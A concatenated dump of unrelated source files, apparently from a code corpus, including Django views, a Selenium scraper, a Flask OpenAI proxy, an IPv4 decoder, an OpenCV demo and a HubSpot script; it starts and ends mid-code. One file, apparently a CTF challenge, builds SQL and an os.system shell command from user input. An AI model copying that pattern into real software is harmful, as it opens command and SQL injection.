                    print('SMS send failed')
                messages.success(request, 'Thanks for Checking-In. Enjoy the meeting.')
                print(user, user.checkInTime, user.checkOutTime)
                return redirect(reverse('god:client'))
    else:
        form = ClientRegistration(None)
    context = {
        "form": form
    }
    return render(request, 'auth/clientRegistration.html', context)
@login_required
def ClientCheckout(request):
    """Guest check-out view: on valid POST, stamp the check-out time, mark
    the guest as out of the meeting and send them a summary email (SendGrid);
    on GET or invalid POST, render the checkout form.
    """
    if request.method == "POST":
        form = Checkout(request.POST)
        if form.is_valid():
            name = form.cleaned_data.get('name')
            email = form.cleaned_data.get('email')
            phone = form.cleaned_data.get('phone')
            # NOTE(review): .get() raises DoesNotExist for an unknown guest
            # instead of returning None, so the else branch below is
            # unreachable and an unknown guest yields a 500 — confirm.
            user = Clients.objects.get(email=email, phone=phone)
            if user is not None:
                messages.success(request, 'Thanks for attending the meeting')
                user.checkOutTime = timezone.now()
                user.inMeeting = False
                user.save()
                context = {
                    "guestName": user.name,
                    "guestEmail": user.email,
                    "guestPhone": phone,
                    "address": request.user.profile.address,
                    "guestCheckInTime": user.checkInTime,
                    "guestCheckOutTime": user.checkOutTime
                }
                # Summary email to the guest via SendGrid.
                message = Mail(
                    from_email=os.environ.get('DEFAULT_FROM_EMAIL'),
                    to_emails=email,
                    subject='Thanks for attending meeting',
                    html_content=render_to_string('snippets/email.html', context))
                sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
                response = sg.send(message)
                print(response.status_code, response.body, response.headers)
                return redirect(reverse('god:client'))
            else:
                messages.error(request, 'Please enter details correctly')
                return redirect(reverse('god:ClientCheckout'))
    else:
        form = Checkout(None)
    context = {
        "form": form
    }
    return render(request, "auth/ClientCheckout.html", context)
| nightwarriorftw/Zeus | zeus/god/views.py | views.py | py | 8,226 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "forms.HostSignUp",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects.create_user",
"line_number": 38,
"usage_type": "call"
... |
6798072131 | import logging
import json
from django.core.management.base import BaseCommand
from ...models import Category, Tag
logger = logging.getLogger('library')
INDUSTRIES_CATEGORY = 'Industries'
EXO_ATTRIBUTES_CATEGORY = 'ExO Attributes'
TECH_CATEGORY = 'Technologies'
INDUSTRIES_LIST = [
'Accommodations', 'Accounting', 'Advertising', 'Aerospace',
'Agriculture & Agribusiness', 'Air Transportation', 'Aircraft',
'Alcohol', 'Apparel & Accessories', 'Auto', 'Aviation', 'Banking',
'Beauty & Cosmetics', 'Big Data', 'Biotechnology', 'Biotechnology',
'Chemical', 'Communications', 'Computer', 'Construction',
'Consulting', 'Consumer Products', 'Cosmetic', 'Cybersecurity',
'Diamond',
'Economy', 'Education', 'Electronics', 'Employment', 'Energy', 'Ethics',
'Entertainment & Recreation',
'Fashion', 'Financial Services', 'Food & Beverage', 'Future',
'Glass', 'Health',
'Hospitality',
'Information',
'Insurance', 'Inspiration', 'Internet of Things', 'Investment and Trading',
'Journalism & News',
'Legal Services', 'Life Sciences', 'Manufacturing',
'Media & Broadcasting', 'Medical', 'Metal', 'Military',
'Motion Pictures & Video', 'Music', 'Nanotechnology',
'Neuroscience', 'Nuclear', 'Packaging', 'Paint & Coatings',
'Oil and Gas',
'Petrochemicals', 'Pharmaceutical', 'Plastics', 'Privacy', 'Private Spaceflight',
'Publishing', 'Pulp & Paper', 'Rail', 'Real Estate', 'Recycling',
'Retail', 'Robotics', 'Security', 'Service', 'Shipping', 'Shipyards',
'Society', 'Solar', 'Space', 'Space-based Economy', 'Specialty Drugs',
'Sporting Goods', 'Sports', 'Steel', 'Sustainability',
'Telecommunications', 'Television', 'Textile', 'Tire', 'Tobacco', 'Toy', 'Transport',
'Utilities',
'Video Game',
'Waste', 'Web Services',
]
EXO_ATTRIBUTES_LIST = [
"Staff on Demand", "Community & Crowd", "Algorithms",
"Leveraged Assets", "Engagement", "Interfaces", "Dashboards",
"Experimentation", "Autonomy", "Social Technologies", 'MTP'
]
DEFAULT_FILTERS = [
'Consulting', 'Education', 'Computer', 'Communications',
'Blockchain', 'Internet of Things', 'Artificial general intelligence',
'Cryptocurrency', 'Virtual Reality'
]
class Command(BaseCommand):
    """Management command: seed Category and Tag rows for industries,
    ExO attributes and technologies (the latter loaded from a JSON file).
    """

    def handle(self, *args, **kwargs):
        # Technology tag names come from a bundled JSON file of objects
        # with a "title" key.
        TECHNOLOGIES = []
        with open('resource/management/commands/technologies.json') as json_data:
            techs = json.load(json_data)
            for tech in techs:
                TECHNOLOGIES.append(tech.get("title"))
        CATEGORIES = [{
            'name': EXO_ATTRIBUTES_CATEGORY,
            'values': EXO_ATTRIBUTES_LIST
        }, {
            'name': INDUSTRIES_CATEGORY,
            'values': INDUSTRIES_LIST
        }, {
            'name': TECH_CATEGORY,
            'values': TECHNOLOGIES
        }]
        for category in CATEGORIES:
            category_name = category.get("name")
            cat, _ = Category.objects.get_or_create(name=category_name)
            # The category name itself also exists as a Tag.
            Tag.objects.get_or_create(name=category.get("name"))
            # NOTE(review): this assignment is redundant — the flag is reset
            # at the top of every loop iteration below.
            default_show_filter = False
            for tag in category.get("values"):
                default_show_filter = False
                # All ExO attributes, plus a curated default list, are shown
                # as filters by default.
                if category_name == EXO_ATTRIBUTES_CATEGORY or tag in DEFAULT_FILTERS:
                    default_show_filter = True
                defaults = {
                    'category': cat,
                    'default_show_filter': default_show_filter
                }
                Tag.objects.update_or_create(name=tag, defaults=defaults)
| tomasgarzon/exo-services | service-exo-medialibrary/resource/management/commands/import_tags_and_categories.py | import_tags_and_categories.py | py | 3,548 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "json.load",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "mo... |
5667997586 | from setuptools import setup
PACKAGES = [
'ladder_network',
'ladder_network.ops',
]
def setup_package():
    """Register the LadderNetwork package and its metadata with setuptools."""
    metadata = dict(
        name="LadderNetwork",
        version='0.1.0',
        description="TensorFlow implementation of Rasmus et. al's Ladder Network",
        author='Joshua D. Loyal',
        url='https://github.com/joshloyal/LadderNetwork',
        license='MIT',
        install_requires=['numpy', 'tensorflow'],
        packages=PACKAGES,
    )
    setup(**metadata)
# Allow `python setup.py ...` invocation.
if __name__ == '__main__':
    setup_package()
| joshloyal/LadderNetwork | setup.py | setup.py | py | 512 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 10,
"usage_type": "call"
}
] |
43195907824 | from tifffile import TiffFile
import collections
import traceback
from collections.abc import Iterable
# NOTE(review): xml.etree.cElementTree was removed in Python 3.9; this
# import should migrate to xml.etree.ElementTree.
from xml.etree import cElementTree as etree
#Class for error handling
class PythImageError(Exception):
    """Package-level error carrying a message, auxiliary error info and the
    traceback text captured at construction time (indented for readability)."""

    def __init__(self, message, errors):
        super().__init__(message)
        # Capture whatever traceback is active when the error is created.
        self.traceback = traceback.format_exc().replace('\n', '\n\t\t')
        self.message = message
        self.errors = errors

    def __str__(self):
        # Only the message repr is surfaced; errors/traceback stay available
        # as attributes for debugging.
        return repr(self.message)
class lazyattr(object):
    """Attribute whose value is computed on first access. As in tifffile.py from Christoph Gohlke"""

    def __init__(self, func):
        # The wrapped zero-argument method whose result will be cached.
        self.func = func

    def __get__(self, instance, owner):
        # with self.lock:
        if instance is None:
            # Accessed on the class itself: return the descriptor object.
            return self
        try:
            value = self.func(instance)
        except AttributeError as e:
            # Re-raise as RuntimeError so the descriptor protocol does not
            # misinterpret the AttributeError as a missing attribute.
            raise RuntimeError(e)
        if value is NotImplemented:
            # Fall back to the base-class attribute of the same name.
            return getattr(super(owner, instance), self.func.__name__)
        # Cache: shadow the descriptor with the computed value on the
        # instance so later accesses skip __get__ entirely.
        setattr(instance, self.func.__name__, value)
        return value
def get_image_source(path):
    '''
    Return the image type ('imagej' or 'ome'). Currently only imageJ and
    ome Tiff files are supported.

    Bug fix: the original checked `tif.is_imagej` twice, so every ImageJ
    file was reported as 'ome' and any other TIFF raised UnboundLocalError.
    The second check now uses `tif.is_ome`, and unsupported files raise an
    explicit error instead of crashing.
    '''
    with TiffFile(path) as tif:
        if tif.is_imagej:
            return 'imagej'
        if tif.is_ome:
            return 'ome'
    raise PythImageError('Unsupported TIFF flavour: %s' % path, None)
def length(a):
    '''
    Return the number of elements in *a*: len(a) for iterables, 1 for
    scalars. A string counts as a single value, not as its characters.
    '''
    # Fix: collections.Iterable was removed in Python 3.10; the abstract
    # base class now lives in collections.abc.
    if not isinstance(a, Iterable) or isinstance(a, str):
        return 1
    return len(a)
def dict_to_string(d, string='', lvl=0):
    """Render *d* as 'key:value' lines (one per entry), each indented by
    *lvl* tab characters and appended to the optional prefix *string*.
    Nested dicts are rendered inline via their repr; there is no recursion.
    """
    indent = '\t' * lvl
    rendered = ['{}{}:{}\n'.format(indent, key, value)
                for key, value in d.items()]
    return string + ''.join(rendered)
def xml2dict(xml, sanitize=True, prefix=None):
    """Return XML as dict. Adapted from the tifffile package by Christoph Gohlke.

    Fix: the original unconditionally called xml.decode(), which raises
    AttributeError for str input — the very case its own doctest exercises.
    Bytes are now decoded (ignoring erroneous characters some software dumps
    into large text fields); str input is parsed as-is.

    >>> xml2dict('<?xml version="1.0" ?><root attr="name"><key>1</key></root>')
    {'root': {'key': 1, 'attr': 'name'}}
    """
    if isinstance(xml, bytes):
        xml = xml.decode('utf-8', errors='ignore')
    return etree2dict(etree.fromstring(xml), sanitize, prefix)
def asbool(value, true=(b'true', u'true'), false=(b'false', u'false')):
    """Return string as bool if possible, else raise TypeError.

    >>> asbool(b' False ')
    False
    """
    normalized = value.strip().lower()
    if normalized in true:  # might raise UnicodeWarning/BytesWarning
        return True
    elif normalized in false:
        return False
    raise TypeError()
def astype(value):
    """Return *value* converted to int, float or bool when possible;
    otherwise return it unchanged."""
    for converter in (int, float, asbool):
        try:
            return converter(value)
        except Exception:
            continue
    return value
def etree2dict(t, sanitize=True, prefix=None):
    '''Convert eTree object to dict.
    Adapted from https://stackoverflow.com/a/10077069/453463

    sanitize strips XML namespace prefixes from tag names; prefix is an
    optional (attribute_prefix, text_prefix) pair applied to attribute keys
    and the synthetic 'value' key for element text.
    '''
    at = tx = ''
    if prefix:
        at, tx = prefix
    key = t.tag
    if sanitize:
        # Drop the '{namespace}' part of the tag, if any.
        key = key.rsplit('}', 1)[-1]
    d = {key: {} if t.attrib else None}
    children = list(t)
    if children:
        # Children sharing a tag are collected into lists.
        # NOTE(review): map(etree2dict, children) recurses with the default
        # sanitize/prefix, not the caller's values — confirm intended.
        dd = collections.defaultdict(list)
        for dc in map(etree2dict, children):
            for k, v in dc.items():
                dd[k].append(astype(v))
        d = {key: {k: astype(v[0]) if len(v) == 1 else astype(v)
                   for k, v in dd.items()}}
    if t.attrib:
        # Attributes become keys alongside the children, optionally prefixed.
        d[key].update((at + k, astype(v)) for k, v in t.attrib.items())
    if t.text:
        text = t.text.strip()
        if children or t.attrib:
            # Mixed content: text is stored under a synthetic 'value' key.
            if text:
                d[key][tx + 'value'] = astype(text)
        else:
            # Leaf element: the text is the value.
            d[key] = astype(text)
    return d
def represents_type(s, atype):
    '''
    Return True if *s* can be converted to *atype* (e.g. int or float),
    False otherwise.
    '''
    try:
        atype(s)
        return True
    except (ValueError, TypeError):
        # TypeError added: e.g. int(None) raises TypeError rather than
        # ValueError, and should also count as "not representable".
        return False
def concatenate(a, b):
    '''
    Append elements of two lists using slice notation; elements of *b* are
    added to the end of *a* (mutating *a* when it is already a list).
    Scalars, strings and dicts are first wrapped in a one-element list.
    '''
    # Fix: collections.Iterable was removed in Python 3.10; the abstract
    # base class now lives in collections.abc.
    if not isinstance(a, Iterable) or isinstance(a, (str, dict)):
        a = [a]
    if not isinstance(b, Iterable) or isinstance(b, (str, dict)):
        b = [b]
    a[len(a):len(a)] = b
    return a
def list_of(lst, object_type):
    """Return True if any element of *lst* is an instance of *object_type*."""
    for element in lst:
        if isinstance(element, object_type):
            return True
    return False
def value_to_key(dictionary, val):
    """Return the unique key of *dictionary* whose value equals *val*.

    Raises LookupError if the value is absent or maps from more than one key.

    Bug fix: the error messages previously called .format() on %-style
    templates ('Value %s ...'), so the value was never interpolated; they
    now use f-strings.
    """
    matches = [key for key, value in dictionary.items() if value == val]
    if not matches:
        raise LookupError(f'Value {val} is not in dictionary')
    if len(matches) > 1:
        raise LookupError(f'More than one key have value {val}!')
    return matches[0]
def rename_duplicates(string_list):
    '''Process a list of strings: elements that occur more than once get a
    positional suffix (_1, _2, ...) in order of appearance; unique elements
    are left untouched.
    '''
    if isinstance(string_list, str) or not isinstance(string_list, list):
        # Fix: raise the specific TypeError (a subclass of Exception, so
        # existing `except Exception` callers still work).
        raise TypeError('Object must be list of strings!')
    output = []
    for idx, val in enumerate(string_list):
        totalcount = string_list.count(val)
        count = string_list[:idx].count(val)  # occurrences seen so far
        output.append(val + '_' + str(count + 1) if totalcount > 1 else val)
    return output
def get_version(package_name):
    '''Return the installed version string of *package_name*.

    Fix: the original imported pkg_resources from the private pip._vendor
    namespace, which is not a public API and is absent from modern pip
    releases. Use the standard-library importlib.metadata instead; raises
    importlib.metadata.PackageNotFoundError if the package is not installed.
    '''
    from importlib.metadata import version
    return str(version(package_name))
{
"api_name": "traceback.format_exc",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "tifffile.TiffFile",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "collections.Iterable",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "xml.... |
40122929996 | """Module for the cli argument parser."""
import sys
from typing import List
from configargparse import ArgumentParser, HelpFormatter
from .globals import (
CONFIG_PATHS,
ALLOWED_SHOW_VALUES,
EXT_LOG_DEFAULT,
EXT_OUT_DEFAULT,
EXT_ERR_DEFAULT,
TOLERATED_USAGE,
BAD_USAGE,
ARGUMENT_ERROR
)
class CustomFormatter(HelpFormatter):
    """
    Custom formatter for setting argparse formatter_class.
    Identical to the default formatter,
    except that very long option strings are split into two
    lines.
    Solution discussed on: https://bit.ly/32CkCWK
    """

    def _format_action_invocation(self, action):
        """Reformats long argument help descriptions."""
        if not action.option_strings:
            # Positional argument: just show its metavar.
            metavar, = self._metavar_formatter(action, action.dest)(1)
            return metavar
        parts = []
        # if the Optional doesn't take a value, format is:
        #    -s, --long
        if action.nargs == 0:
            parts.extend(action.option_strings)
        # if the Optional takes a value, format is:
        #    -s ARGS, --long ARGS
        else:
            default = action.dest.upper()
            args_string = self._format_args(action, default)
            for option_string in action.option_strings:
                # parts.append('%s %s' % (option_string, args_string))
                parts.append(f"{option_string}, {args_string}")
        # Fit on one line if it stays within the help width; otherwise
        # split onto an indented continuation line.
        if sum(len(s) for s in parts) < self._width - (len(parts) - 1) * 2:
            return ', '.join(parts)
        # else
        return ',\n        '.join(parts)
class CLIArgumentParser(ArgumentParser):
    """
    Parser based on configargparse ArgumentParser to be able
    to ignore config files.
    """

    # Instance flag; set to False in __init__, True via ignore_configs().
    _ignore_configs = None

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._ignore_configs = False

    def set_default_config_paths(self, config_paths):
        """Set default config paths."""
        self._default_config_files = config_paths

    def ignore_configs(self):
        """Mainly for testing, ignore configs every time"""
        self._ignore_configs = True

    def get_params(self, args: List = None):
        """Parse *args* twice: a first pass determines whether the user set
        --ignore-config; unless ignored, the default config files are added
        before the final parse. Help requests get config paths immediately
        (parse_args(["-h"]) exits the process).
        """
        if args is None:
            args = []
        # add config paths if help wanted
        if "-h" in args or "--help" in args:
            self.set_default_config_paths(CONFIG_PATHS)
            self.parse_args(["-h"])
            # exit
        # else check if --ignore-config is set
        prio_args = self.parse_args(args)
        if not prio_args.ignore_config and not self._ignore_configs:
            # if not set add config paths
            self.set_default_config_paths(CONFIG_PATHS)
        return self.parse_args(args)

    def error(self, message: str):
        # Override argparse's default exit code with the project-wide
        # ARGUMENT_ERROR constant.
        self.print_usage(sys.stderr)
        self.exit(ARGUMENT_ERROR, f"{self.prog}: error: {message}\n")
def setup_parser() -> CLIArgumentParser:
    """
    Define parser with all arguments listed below: input paths, extension
    suffixes, display options, usage thresholds and config-file handling.

    :return: parser
    """
    parser = CLIArgumentParser(
        formatter_class=CustomFormatter,
        # Todo: Change when fixed:
        # https://github.com/bw2/ConfigArgParse/issues/217
        allow_abbrev=False,
        description="Analyze or summarize HTCondor-Joblogs",
    )
    parser.add_argument(
        "paths",
        nargs="*",
        help="Directory of file paths for log files"
    )
    parser.add_argument(
        "-r", "--recursive",
        action="store_true",
        default=False,
        help="Recursive search through directory hierarchy"
    )
    parser.add_argument(
        "--version",
        help="Get the current version of this script",
        action="store_true"
    )
    parser.add_argument(
        "-v", "--verbose",
        help="Print out extended execution details",
        action="store_true",
        default=False
    )
    parser.add_argument(
        "--analyze",
        action="store_true",
        default=False,
        help="Analyze given files one by one"
    )
    # File-extension suffixes used to associate .log/.out/.err files.
    parser.add_argument(
        "--ext-log",
        help="Suffix of HTCondor job logs (default: none)",
        default=EXT_LOG_DEFAULT
    )
    parser.add_argument(
        "--ext-out",
        help="Suffix of job out logs (default: .out)",
        default=EXT_OUT_DEFAULT
    )
    parser.add_argument(
        "--ext-err",
        help="Suffix of job error logs (default: .err)",
        default=EXT_ERR_DEFAULT
    )
    allowed_show_vals = ALLOWED_SHOW_VALUES[:]  # copy; don't mutate the global
    allowed_show_vals.append('')  # needed so empty list are valid in config
    parser.add_argument(
        "--show",
        nargs="+",
        default=[],
        dest="show_list",
        choices=allowed_show_vals,
        help="Show more details"
    )
    parser.add_argument(
        "--rdns-lookup",
        action="store_true",
        default=False,
        help="Resolve the ip-address of an execution nodes"
        " to their dns entry"
    )
    # Resource-usage thresholds (fractions) for warnings vs. hard flags.
    parser.add_argument(
        "--tolerated-usage",
        type=float,
        help="Threshold to warn the user, "
             "when a given percentage is exceeded "
             "between used and requested resources",
        default=TOLERATED_USAGE
    )
    parser.add_argument(
        "--bad-usage",
        type=float,
        help="Threshold to signal overuse/waste of resources, "
             "when a given percentage is exceeded "
             "between used and requested resources",
        default=BAD_USAGE
    )
    # --config and --ignore-config are mutually exclusive by construction.
    action = parser.add_mutually_exclusive_group()
    action.add_argument(
        "-c", "--config",
        is_config_file=True,
        help="Path to config file"
    )
    action.add_argument(
        "--ignore-config",
        action="store_true",
        help="Do not search for config"
    )
    return parser
| psyinfra/HTCAnalyze | htcanalyze/cli_argument_parser.py | cli_argument_parser.py | py | 5,847 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "configargparse.HelpFormatter",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "configargparse.ArgumentParser",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 75,
"usage_type": "name"
},
{
"api_name":... |
6981217998 | import os
import sys
import json
from applnlayer.ApplnMessageTypes import ResponseMessage
def serialization(rm):
    """Serialize a ResponseMessage-like object (with .code and .contents)
    to its JSON string representation."""
    payload = {
        "code": rm.code,
        "contents": rm.contents,
    }
    return json.dumps(payload)
def deserialization(buf):
    """Parse a JSON string produced by serialization() back into a
    ResponseMessage instance."""
    parsed = json.loads(buf)
    rm = ResponseMessage(0, None)
    rm.code = parsed["code"]
    rm.contents = parsed["contents"]
    return rm
| mandali8686/PA3manda | response_serialization.py | response_serialization.py | py | 413 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.dumps",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "applnlayer.ApplnMessageTypes.ResponseMessage",
"line_number": 20,
"usage_type": "call"
}
] |
5795982413 | from selenium import webdriver
import csv
def Skill():
    """Scrape job links from jobs.af, collect each job's skills description
    and write them to submission.csv.

    Fixes over the original:
    - Pages with zero or several description paragraphs previously skewed
      the pairing between URLs and descriptions (and the hardcoded
      range(0, 12) raised IndexError when fewer rows existed); paragraphs
      are now joined into one entry per URL and rows are written with zip.
    - Output is written with the csv module (already imported but unused),
      so commas inside descriptions are quoted correctly.
    - The browser is always quit, even on error.
    """
    driver = webdriver.Chrome()
    driver.maximize_window()
    driver.implicitly_wait(120)
    try:
        driver.get("https://www.jobs.af/")
        hrefs = []
        for anchor in driver.find_elements_by_xpath('//div[@class="item-header"]//h2//a'):
            try:
                hrefs.append(anchor.get_attribute('href'))
            except Exception as exc:
                print(exc)
        descriptions = []
        for link in hrefs:
            driver.get(link)
            try:
                paragraphs = driver.find_elements_by_xpath(
                    '//*[./preceding-sibling::h3="Skills Description:"]//p')
            except Exception:
                paragraphs = []
            # One entry per job page keeps URL/description rows aligned.
            descriptions.append(' '.join(p.text for p in paragraphs))
        with open('submission.csv', 'w', newline='') as data_file:
            writer = csv.writer(data_file)
            # NOTE(review): the original header named this column "Title"
            # although it holds the skills description.
            writer.writerow(['Url', 'Title'])
            for link, description in zip(hrefs, descriptions):
                writer.writerow([link, description])
    finally:
        driver.quit()
# Run the scraper when executed directly.
if __name__ == '__main__':
    Skill()
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 4,
"usage_type": "name"
}
] |
31522303288 | import os
import openai
from flask import Flask, redirect, render_template, request, url_for, jsonify
app = Flask(__name__)
openai.api_key = os.getenv("OPENAI_API_KEY")
@app.route("/", methods=("GET", "POST"))
def index():
if request.method == "GET":
query_parameters = request.args
if query_parameters.get("prompt"):
prompt = query_parameters.get("prompt")
response = openai.Completion.create(
model="text-davinci-003",
prompt=prompt,
temperature=0.6,
max_tokens=4000-int(len(prompt)/5),
)
return jsonify(response.choices[0].text)
return jsonify('No prompt provided')
return jsonify('ChatGPT API') | fujiwen/chatgpt-api-flask | app.py | app.py | py | 746 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.getenv",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"li... |
74912810023 | import struct
import socket
from prettytable import PrettyTable
class IPv4(object):
    """Decoder for a fixed 20-byte IPv4 header (no options field)."""

    # (display label, attribute name) pairs in wire order; drives __init__,
    # info() and data().
    _FIELDS = (
        ('version', 'version'),
        ('header length', 'headerlen'),
        ('type of service', 'tos'),
        ('total length', 'totalLen'),
        ('header identification', 'identification'),
        ('others and fragment offset', 'fragment'),
        ('time to live', 'ttl'),
        ('type of protocol', 'protocol'),
        ('header checksum', 'checksum'),
        ('src IP address', 'srcIP'),
        ('dst IP address', 'dstIP'),
    )

    def __init__(self):
        # All fields start unset; decodeIP() populates them.
        for _label, attr in self._FIELDS:
            setattr(self, attr, None)

    def decodeIP(self, buffer):
        """Unpack a 20-byte big-endian IPv4 header into the instance fields."""
        (version_and_len, self.tos, self.totalLen, self.identification,
         self.fragment, self.ttl, self.protocol, self.checksum,
         src_raw, dst_raw) = struct.unpack('>cBHHHBBHII', buffer)
        # The first byte packs two 4-bit fields: version and header length.
        nibbles = version_and_len.hex()
        self.version = nibbles[0]
        self.headerlen = nibbles[1]
        # Repack each address big-endian and format as dotted-quad text.
        self.srcIP = socket.inet_ntoa(struct.pack('>I', src_raw))
        self.dstIP = socket.inet_ntoa(struct.pack('>I', dst_raw))

    def info(self):
        """Return a PrettyTable with one row per header field."""
        table = PrettyTable()
        for label, attr in self._FIELDS:
            table.add_row([label, getattr(self, attr)])
        return table

    def data(self):
        """Return the decoded field values as a list, in wire order."""
        return [getattr(self, attr) for _label, attr in self._FIELDS]
| fishmingyu/tcpStatis | IPv4Decode.py | IPv4Decode.py | py | 2,338 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "struct.unpack",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "socket.inet_ntoa",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "struct.pack",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "socket.ntohl",
"line_n... |
23528325219 | #!/usr/bin/python3
import os
import tempfile
import argparse
def query_db(row):
    """Run 'SELECT <row> FROM employees' against the chinook database via
    the sqlite3 CLI and print the results; defaults to FirstName.

    SECURITY NOTE(review): `row` is interpolated into both a SQL statement
    and a shell command line (os.system + echo), enabling SQL and shell
    command injection. This file lives in a CTF-challenge repository where
    the vulnerability may be intentional — confirm before hardening.
    """
    if not row:
        row = 'FirstName'
    sql = f".open /home/jared/chinook.db\nSELECT {row} FROM employees;"
    os.system(f'echo "{sql}" | /usr/bin/sqlite3')
    print("Done!")
# CLI entry point: `query_db.py --row <column>`.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("--row", help="Row to query")
    args = parser.parse_args()
    query_db(args.row)
| zeyu2001/My-CTF-Challenges | STANDCON-2021/pwn/space-university-of-interior-design/service/src/query_db.py | query_db.py | py | 448 | python | en | code | 36 | github-code | 36 | [
{
"api_name": "os.system",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 18,
"usage_type": "call"
}
] |
14302631347 | '''Smoothing/Blurring is done when an img has a lot of noise such as camera sensors,lighting issues,etc'''
import cv2 as cv
import numpy as np  # NOTE(review): unused in this script
# Demonstrates the four OpenCV smoothing techniques side by side.
img = cv.imread('Resources/Photos/cats.jpg')
cv.imshow('Original', img)
# 1.) Averaging - Each pixel is replaced by the average value of all pixels in the kernel window i.e. for a 3*3 kernel the centre pixel will be replaced by avg of other 8 surrounding pixels
average = cv.blur(img, (3,3))  # 3x3 kernel; a larger kernel increases blur
cv.imshow('Average Blur', average)
# 2.) GaussianBlur - similar to averaging but surrounding pixels get a weight, so a weighted avg is computed. Less blurring than Averaging but looks more natural.
gauss = cv.GaussianBlur(img, (3,3), 0)  # 0 = sigma in x direction (auto-derived)
cv.imshow('Gaussian Blurred', gauss)
# 3.) Median Blur - Instead of averaging it replaces each pixel with the median of its neighborhood.
# Stronger than the two above and effective against SALT & PEPPER NOISE.
# Not effective with larger kernel sizes such as 5*5 or 7*7.
median = cv.medianBlur(img, 3)  # scalar 3 means a 3x3 aperture
cv.imshow('Median Blur', median)
# 4.) Bilateral Blurring - blurs while RETAINING edges, unlike the methods above.
# Args: 10 = neighborhood diameter; 20 = sigma color (more colors mixed);
# 20 = sigma space (farther pixels influence the blur more).
bilateral = cv.bilateralFilter(img, 10, 20, 20)
cv.imshow('Bilateral blurring', bilateral)
cv.waitKey(0)  # block until a key press so the windows stay open
{
"api_name": "cv2.imread",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "cv2.blur",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 12,
... |
9901411991 | import requests
import json
import urllib
from requests.exceptions import HTTPError
def getContact(email, apikey):
    """Fetch a contact's phone, first and last name from the HubSpot
    contacts API.

    Returns a dict with keys 'phone', 'name' and 'lastname'. Properties
    missing from the contact record come back as empty strings; on any
    request failure every field is the sentinel string 'error'.
    """
    contact = {}
    try:
        url = ('https://api.hubapi.com/contacts/v1/contact/email/'
               + email + '/profile?hapikey=' + apikey)
        response = requests.get(url)
        response.raise_for_status()
        properties = response.json()['properties']
        # Map HubSpot property names onto the keys callers expect; absent
        # properties default to the empty string.
        for prop, key in (('phone', 'phone'),
                          ('firstname', 'name'),
                          ('lastname', 'lastname')):
            contact[key] = properties[prop]['value'] if prop in properties else ""
        # BUG FIX: the original only returned from the except branches, so a
        # *successful* lookup fell off the end of the function and returned
        # None, crashing the caller.
        return contact
    except HTTPError as http_err:
        if response.status_code == 404:
            print("------ ERROR: contact " + email + " might not exist. Maybe it was deleted ------")
        else:
            print(f"--- HTTP error occurred: {response}")
    except Exception as err:
        print(f'------- Other error occurred: {err}')
    # Every failure path ends up here with sentinel values for all fields.
    return {'phone': 'error', 'name': 'error', 'lastname': 'error'}
def processEvent(e, statusDict):
    """Fold one HubSpot e-mail event into statusDict.

    statusDict maps recipient e-mail -> the "furthest" event type seen so
    far along SENT -> PROCESSED -> DELIVERED -> OPEN -> CLICK.  DROPPED,
    BOUNCE and SPAMREPORT are terminal and never overwritten; STATUSCHANGE
    and DEFERRED always overwrite a non-terminal status.
    """
    final_states = ('DROPPED', 'BOUNCE', 'SPAMREPORT')
    always_overwrite = ('STATUSCHANGE', 'DEFERRED')
    # Position in the delivery funnel; unknown types rank lowest.
    progress = {'SENT': 1, 'PROCESSED': 2, 'DELIVERED': 3,
                'OPEN': 4, 'CLICK': 5}
    email = e['recipient']
    incoming = e['type']
    if email not in statusDict:
        # First event seen for this recipient is stored unconditionally.
        statusDict[email] = incoming
        return
    current = statusDict[email]
    # Terminal states and repeats never change.
    if current in final_states or current == incoming:
        return
    # Otherwise, only move *forward* in the funnel (or take the special
    # STATUSCHANGE/DEFERRED events, which always win).
    if incoming in always_overwrite or \
            progress.get(incoming, 0) > progress.get(current, 0):
        statusDict[email] = incoming
def main():
    """Interactively fetch all e-mail events for one HubSpot campaign and
    write a "email,phone,name,lastname,status" line per contact to
    contactsCampaign.csv.
    """
    apikey = input('What\'s is your API Key? ')
    campaignId = input('What\'s the campaignId? ')
    statusDict = {}
    try:
        print("- Downloading Events from Hubspot API for Campaign " + campaignId + " ...")
        base_url = ('https://api.hubapi.com/email/public/v1/events?hapikey='
                    + apikey + '&campaignId=' + campaignId)
        offset = None
        # Single pagination loop (the original duplicated the request code
        # before and inside its while loop).
        while True:
            url = base_url if offset is None else base_url + '&offset=' + offset
